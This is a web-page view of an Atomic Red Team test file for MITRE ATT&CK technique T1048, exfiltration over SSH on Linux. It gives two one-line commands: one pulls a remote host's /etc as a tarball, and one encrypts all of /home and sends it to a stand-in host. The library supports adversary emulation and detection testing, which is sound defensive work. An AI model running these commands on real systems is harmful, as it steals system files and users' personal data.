security-tools/atomic-red-team
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity
Files
3e4ba89cf472aa88518eea3a85b4469bcc3bbcb5
atomic-red-team/Linux/Exfiltration/Exfiltration_Over_Alternative_Protocol.md
T
Michael Haag 7dbbb68677 Update Exfiltration_Over_Alternative_Protocol.md
2018-02-08 06:52:43 -06:00

351 B
Raw Blame History

Exfiltration Over Alternative Protocol

MITRE ATT&CK Technique: T1048

SSH

Remote to Local:

ssh target.example.com "(cd /etc && tar -zcvf - *)" > ./etc.tar.gz

Local to Remote:

tar czpf - /home/* | openssl des3 -salt -pass pass:1234 | ssh foo@example.com 'cat > /home.tar.gz.enc'
Reference in New Issue View Git Blame Copy Permalink